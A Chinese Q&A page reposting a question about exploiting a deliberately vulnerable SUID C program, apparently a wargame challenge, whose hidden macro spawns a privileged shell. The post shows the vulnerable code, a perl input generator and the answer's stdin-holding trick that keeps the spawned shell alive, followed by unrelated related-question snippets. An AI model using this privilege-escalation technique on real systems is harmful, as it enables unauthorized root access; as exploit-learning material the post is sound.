gdb 退出而不是生成 shell

2023-12-25

我正在尝试利用 SUID 程序。

该计划是：

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>


#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)
{
    int i;
    printf("[ ");
    for(i=0; i < len; i++) printf("%x ", buf[i]); 
    printf(" ]\n");
}

int main()
{
    unsigned char buf[512];
    unsigned char *ptr = buf + (sizeof(buf)/2);
    unsigned int x;

    while((x = getchar()) != EOF) {
            switch(x) {
                    case '\n': print(buf, sizeof(buf)); continue; break;
                    case '\\': ptr--; break; 
                    default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
            }
    }
    printf("All done\n");
}

我们可以很容易地看到，如果我们以某种方式将 ptr 的内容更改为某个以 CA 开头的地址，那么将为我们生成一个新的 shell。由于 ptr 通常保存一些以 FF 开头的地址，因此减少它（ptr）的方法是输入 \ 字符。所以我创建了一个包含 0x35000000 个 '\' 字符的文件，最后在文件末尾添加了 3 个 'a'

perl -e "print '\\\'x889192448" > file     # decimal equivalent of 0x35000000
echo aaa > file        # So that e() is called which actually spawns the shell

最后在 gdb 中，

run < file

然而，gdb 并没有生成 shell，而是说

process <some number> is executing new program /bin/dash
inferior 1 exited normally

然后返回 gdb 提示符而不是获取 shell。我已经通过在适当的位置设置断点来确认 ptr 确实在调用 setresuid() 之前以 CA 开头。

另外，如果我在 gdb 之外通过管道传递它，则什么也不会发生。

./vulnProg < file

Bash 提示符返回。

请告诉我我在哪里犯了错误。

编译一个更简单的测试程序就可以看出问题

int main()  { execlp("/bin/sed", "-e", "s/^/XXX:/", NULL); }

所有这一切都是启动一个 sed 版本（而不是 shell）并通过在前面添加“XXX:”来转换输入。

如果运行生成的程序，并在终端中键入，您会得到如下行为：

$./a.out 
Hello
XXX:Hello
Test
XXX:Test
^D

这正是我们所期望的。

现在，如果您从包含“Hello\nWorld”的文件中为其提供输入，您会得到

$./a.out < file 
XXX:Hello
XXX:World
$

应用程序立即退出，当输入文件全部读取后，应用程序的输入流将被关闭。

如果你想提供额外的输入，你需要使用一个技巧来不破坏输入流。

{ cat file ; cat - ; } | ./a.out

这会将文件中的所有输入放入正在运行的./a.out进而从标准输入读取并添加它。

$ { cat file ; cat - ; } | ./a.out
XXX:Hello
XXX:World
This is a Test
XXX:This is a Test

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

c

bash

shell

GDB

suid

gdb 退出而不是生成 shell 的相关文章

如何将十六进制字符串转换为十六进制数字[重复]

这个问题在这里已经有答案了可能的重复如何将十六进制字符串转换为有符号整数 https stackoverflow com questions 3705429 how do i convert hex string into signed
使用API隐藏程序标题栏

它可以使用 c 和 windows api 删除窗口控制台标题栏如果是的话如何请这个简单的应用程序隐藏并显示其所在控制台的标题栏它会立即将控制台标题更改为 guid 以查找窗口句柄然后它使用 ToggleTitleBar 使用找
如何在 Asp.net Gridview 列中添加复选框单击事件

我在 asp 中有一个 gridview 其中我添加了第一列作为复选框列现在我想选择此列并获取该行的 id 值但我不知道该怎么做这是我的 Aspx 代码
单线程公寓问题

从我的主窗体中我调用以下命令来打开一个新窗体 MyForm sth new MyForm sth show 一切都很好但是这个表单有一个组合框当我将其 AutoCompleteMode 切换为建议和追加时我在显示表单时遇到了这个异常
我可以仅在少数情况下关闭模拟吗

我有一个始终使用模拟的应用程序但是当用户以管理员身份登录时一些操作需要他们写入服务器本身现在如果这些用户在实际服务器上没有权限有些用户没有则不会让他们写入我想做的是关闭几个命令的模拟有没有办法做这样的事情 using Ho
无法加载文件或程序集“EntityFramework，版本=6.0.0.0”

我究竟做错了什么我该如何解决这个问题我有一个包含多个项目的解决方案它是一个 MVC NET 4 5 Web 应用程序在调试模式下启动后调用其中一个项目时出现此错误导致此错误的项目具有以下参考两个都是版本6 0 0 0 应用程序
您可以在一个 Windows Azure 实例上部署多个 Web 应用程序吗？

是否可以在一个 windows azure 小型计算实例中运行一堆 Web 应用程序我正在考虑使用 Azure 作为放置一堆处于开发和非生产状态的项目 Web 应用程序的地方有些实际上已经被封存了但我想在某个地方有一个活跃的实例我
防止GDB中的PLT（过程链接表）断点

在最新版本的 GDB 中在库函数调用上设置断点会导致多个实际断点调用过程链接表 PLT 实际的函数调用这意味着当调用库函数时我们每次都会经历两次中断在以前的 GDB 版本中只会创建 2 因此您只能得到一次中断那么问题来了是否
格式化货币

在下面的示例中逗号是小数点分隔符我有这个 125456 89 我想要这个 125 456 89 其他示例 23456789 89 gt 23 456 789 89 Thanks 看看这个例子 double value 12345 678
以编程方式更新 ClickOnce 应用程序的部署清单会导致缺少 4.0 中所需的 <兼容框架> 元素

我正在致力于自动化 NET 4 0 ClickOnce WPF 应用程序的安装程序该应用程序需要在应用程序配置文件我经历了寻找必须遵循的具体步骤的棘手过程Mage exe http msdn microsoft com en us li
C#中Enum中定义的value__是什么

What value 可能在这里 value MSN ICQ YahooChat GoogleTalk 我运行的代码很简单 namespace EnumReflection enum Messengers MSN ICQ YahooChat
dropdownlist DataTextField 由属性组成？

有没有一种方法可以通过 C 使 asp net 中的下拉列表的 datatextfield 属性由对象的多个属性组成 public class MyObject public int Id get set public string Nam
将非算术类型作为参数传递给 cmath 函数是否有效？

给定以下用户定义类型S具有转换功能double struct S operator double return 1 0 以及以下调用cmath http en cppreference com w cpp header cmath使用类型的
设计 Javascript 前端 <-> C++ 后端通信

在我最近的将来我将不得不制作一个具有 C 后端和 Web 前端的系统要求目前我对此了解不多我认为前端将触发数据传输而不是后端所以不需要类似 Comet 的东西由于在该领域的经验可能很少我非常感谢您对我所做的设计决策的评论
不兼容的类型 - 是因为数组已经是指针吗？

在下面的代码中我创建一个基于书籍结构的对象并让它保存多个书籍我设置的是一个数组即定义启动的对象然而每当我去测试我对指针的了解实践有帮助并尝试创建一个指向创建的对象的指针时它都会给我错误 C Users Justin D
TPL 数据流块下游如何获取源生成的数据？

我正在使用 TPL Dataflow 处理图像我收到处理请求从流中读取图像应用多次转换然后将生成的图像写入另一个流 Request gt Stream gt Image gt Image gt Stream 为此我使用块 Buff
ASP.NET Core Razor Page 多路径路由

我正在使用 ASP NET Core 2 0 Razor Pages 不是 MVC 构建系统但在为页面添加多个路由时遇到问题例如所有页面都应该能够通过 abc com language 访问segment shop mypage 或
如何将对象转换为传递给函数的类型？

这不会编译但我想做的只是将对象转换为传递给函数的 t public void My Func Object input Type t t object ab TypeDescriptor GetConverter t ConvertFro
从有符号字符转换为无符号字符然后再转换回来？

我正在使用 JNI 并有一个 jbyte 类型的数组其中 jbyte 表示为有符号字符即范围从 128 到 127 jbyte 表示图像像素对于图像处理我们通常希望像素分量的范围为0到255 因此我想将jbyte值转换为0到255
新的 .NET 6 控制台模板中的 C# 函数重载不起作用

我在尝试重载该函数时遇到错误Print object in the 新的 NET 6 C 控制台应用程序模板 https learn microsoft com en us dotnet core tutorials top level t

随机推荐

由于从 float 自动转换为 double，std::num_put 出现 nan-boxing 问题

我在用着这个帖子 https stackoverflow com a 53691931 3336423用一些额外的信息来扩展 nan 值和这个帖子 https stackoverflow com a 35272035 3336423修改st
PHP - 自动创建多维数组

所以这是输入 in a b c d value 以及所需的输出 out a b c d value 有任何想法吗我尝试过以下代码但没有任何运气 in a b c d value str a b c d str implode explo
spring boot setContentType 不起作用

我正在尝试在 spring boot 1 2 2 上返回图像我应该如何设置内容类型以下内容都不适合我这意味着响应标头根本不包含内容类型标头 RequestMapping value files2 file name method R
如何使用 NextJS 13 实施 Google Analytics？

GoogleAnalytics tsx use client import Script from next script const GoogleAnalytics GA TRACKING ID GA TRACKING ID string
Errno 185090050 _ssl.c:343: error:0B084002:x509 证书例程:X509_load_cert_crl_file:system lib，通过 PyInstaller 打包到 exe 后

我编写了一个 python 脚本来检查 GCS 中的文件它使用 wxpython 生成 GUI 为了进行身份验证我以这种方式做到了按照 Google 示例代码中的方式 gt http code google com p google
如何使用 python、numpy 和 scipy 积分弧长？

另外一个thread https math stackexchange com questions 433094 how to determine the arc length of ellipse 我看到有人设法使用 mathematic
iPad 中无法播放音频
从数据框列表中绘制多个图

我有一个包含 21 个不同数据帧的列表名为 proc r1 我正在尝试制作 21 个图表每个图表都使用列表中每个数据框的数据我下面所做的仅适用于列表中的第一个数据框我为 plotdf1 编写的 ggplot 是我需要从每个数据帧生成
document.createElement('script')... 使用一个回调添加两个脚本

我需要添加原型然后添加 scriptaculous 并在它们都完成加载时获取回调我目前正在加载原型如下所示 var script document createElement script script src http ajax g
条件“点击”与 Knockout 绑定

我将单击事件绑定到列表中的每个列表项 ul class modal subject list li li ul 我想禁用click 如果 hasBeenAdded 解析为 true 则绑定我知道一些处理它的凌乱方法有两个列表项一项用于
更新 Flutter 上的部分 UI

要更新整个小部件很容易我们调用SetState 我们进行了更改但是如果我不需要更新所有内容会怎样 I have this UI 当我加载该页面时我从应用程序提供商处获取元素数组 Widget build BuildContext co
ASP.NET MVC 3：具体实现的输出特定视图

我有一个基本类型的 IEnumerable 作为我的模型我需要根据具体类型在列表中显示不同的 HTML 部分因此生成的列表可能类似于 HTML 中的以下内容 ul li class points Points Item 1 10 po
通过不同的关系从另一个表中获取多个值

我有两个表 USER 和 SUBJECTS 用户表主题表表 USER 中的 SUBJECT1 SUBJECT2 SUBJECT3 是表 SUBJECT 中列 ID 的外键我正在尝试编写一个 SQL 查询该查询返回第一个表中的所有列以
了解 Ruby 和操作系统 I/O 缓冲

Ruby 中的 IO 缓冲如何工作使用时数据刷新到底层流的频率是多少IO and File课程这与操作系统缓冲相比如何在自信地读回数据进行处理之前需要做什么来保证给定的数据已写入磁盘 Ruby IO 文档并不是 100 清楚地说明了
从 Pinterest 网址获取图板的所有图像

这个问题听起来很简单但其实并不像听起来那么简单简要总结出了什么问题例如使用此板 http pinterest com dodo web designui and mobile http pinterest com dodo web
为什么 GNU ld 在链接可执行文件和共享对象时解析符号的方式不同？

我有一段简单的 C 代码看起来像这样 include
使用 PHP、MySQL 的 Chart.js 数据数组。如何从 JSON 数组定义数据源？

这是我的第一个问题对于任何错误敬请谅解我正在尝试使用带有 PHP 和 MySQL 数据的 Chart js 绘制图表我打算绘制的图表是一个简单的垂直条形图出生年与出生人数当我显示数组 BIRTH YEAR 和 COUNTS 时
更新软件包列表时显示“InRelease：Clearsigned 文件无效，收到‘NODATA’（网络是否需要身份验证？）”

这是我在终端中看到的内容 user user OptiPlex 9020 sudo apt get update Ign http extras ubuntu com trusty InRelease Ign http in archive
在 Cuda 中减少任意数量的元素

如何实现以下链接中给出的代码的版本 7 http www cuvilib com Reduction pdf http www cuvilib com Reduction pdf对于大小为任意数字即不是 2 的幂的输入数组版本 7 已
gdb 退出而不是生成 shell

我正在尝试利用 SUID 程序该计划是 include

gdb 退出而不是生成 shell

gdb 退出而不是生成 shell 的相关文章

随机推荐

热门标签